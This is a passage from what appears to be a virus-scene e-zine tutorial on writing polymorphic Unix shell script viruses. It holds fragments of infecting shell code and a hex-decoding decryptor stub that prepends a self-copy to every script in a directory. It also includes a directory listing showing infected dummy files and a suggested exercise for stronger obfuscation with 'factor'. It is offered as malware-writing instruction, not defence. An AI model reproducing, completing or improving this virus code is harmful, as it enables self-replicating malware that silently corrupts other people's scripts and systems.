                echo $HOST | tr \xc7 '\n' | grep -v '#!/bin/sh'
                for V in $(tail -1 $1)
                        [ ${#V} -eq 4 ] && VIRUS="$VIRUS $V $RANDOM"
                echo "# $RANDOM$VIRUS"
                } > $F 2>/dev/null
rm $0 2>/dev/null

Even I write "" as the script's name, its real name is "-", to avoid repeating another script's name and also to make more difficult its visibility, as explained in the 3.3.2 chapter.

What we first try to do is to infect the whole directory. For this we check if the file attacked is a shell script, by using "head", but we keep from trying it with our own shell script, because "-" is interpreted by "head" as the standard input (stdin) and waits for input. So we introduce a check by using an "OR list" and then we will only use the "head" when the file is not "-".

After, we save the whole "host" file in an environment variable. In that way we keep from saving the "host" file into a temporary file where to attach the viric code. The rest of the code is concatenated into the environment variable, and the result of all this stuff is redirected to the final file, by using a command block ("{}", look for chapter 2.2.1->Command blocks).

In that block we'll do the following:

And with all this we have our infection completed. As we can see, as well as the "cyphered" part, the "decrypted" part vary from infection to infection, even though, the "decrypting" routine can be made more polymorphic; actually, we only have 2 possible routines O:-)

This way, this is how the polymorphic virus should look like:

rm ./- 2>/dev/null
for C in $(tail -2 $0); do [ ${#C} -eq 4 ] && printf "\x$(expr substr $C 3 2)\x$(expr substr $C 1 2)">>-; done
sh ./- $0 &
# virus code goes here hexdumped

The last line of the code is a commented line which contains the whole code in hexadecimal base, so this is the most extended part of the virus.

Now let's see how it looks like before and after an infection:

drwxr-sr-x 2 zert users  4096 Aug 5 21:58 .
drwxr-sr-x 3 zert users  4096 Aug 4 20:42 ..
-rwxr-xr-x 1 zert users    21 Aug 5 22:22 dummy1
-rwxr-xr-x 1 zert users    21 Aug 5 22:22 dummy2
-rwxr-xr-x 1 zert users    21 Aug 5 22:22 dummy3
-rwxr-xr-x 1 zert users    21 Aug 5 22:22 dummy4
-rwxr-xr-x 1 zert users    21 Aug 5 22:22 dummy5
-rwxr-xr-x 1 zert users  2628 Aug 5 21:58

What we can see here is the tests directory without having infected any "host" file ("dummy" files). "" is our virus' first generation.

drwxr-sr-x 2 zert users  4096 Aug 5 22:23 .
drwxr-sr-x 3 zert users  4096 Aug 4 20:42 ..
-rwxr-xr-x 1 zert users  6552 Aug 5 22:23 dummy1
-rwxr-xr-x 1 zert users  6527 Aug 5 22:23 dummy2
-rwxr-xr-x 1 zert users  6564 Aug 5 22:23 dummy3
-rwxr-xr-x 1 zert users  6589 Aug 5 22:23 dummy4
-rwxr-xr-x 1 zert users  6538 Aug 5 22:23 dummy5
-rwxr-xr-x 1 zert users  2628 Aug 5 21:58

The same directory after "" was executed. As we can see, the size of every file is different, even they started with the same size. Another important point is that the first generation of the virus ("" before infecting) has a smaller size than the second generation virus, which has a size near 6500 bytes :-)

We can make it much more difficult by using "factor" to get the prime factors of a number. That number could be the ASCII code of the virus or each line or a reversible calculus between them. With "factor" we cypher owr code and with a multiplication between the gotten factors (expr OP1 * OP2) we "decypher" the code. Writing an example for this is a proposed exercise for the reader O;-P

4. Conclusions

4.1. The future of the shell scripts

As we could have seen through this little tutorial, there are many posibilities to let us play with shell script viruses. I say play because I do not think these can be considered potential viruses due to their time excess, size in "host" and the common property of the shell scripts, which is being human readable (ASCII text human readable).

We talked before about the "home UNIX environments socialization", with the arrival of the BSDs and the different Linux distributions. All this makes a new place for this kind of viruses, sheltered by the new ignorant users.

The power increment in new processors and the great storing capability that storing devices offer us are helping this kind of viruses, which will diminish the execution delays and will hide the increment in the "host's" size.

So the conclusion to all this is that shell script viruses are not a real threat for the UNIX systems, but they may have a raising space between them.

4.2. Thanks

Now, to finish, I would like to thank Virusbuster the oportunity of writing in the best e-zine of the viruscene known worldwide, I am really glad about it ;-)

Thanks haLLs for helping me translating this to english O:-) and giving new ideas, zgor for his comments about permissions in shell scripts, as well as all the int80h group for their support and for their wants of working in this.

Thanks Snakebyte and Gobleen Warrior for motivating me to write this little tutorial with their excellent texts.

To all the GNU community that works day to day for a better software, open and free: you are awesome ;-)

5. References

[Back to index] [Comments]
By accessing, viewing, downloading or otherwise using this content you agree to be bound by the Terms of Use! aka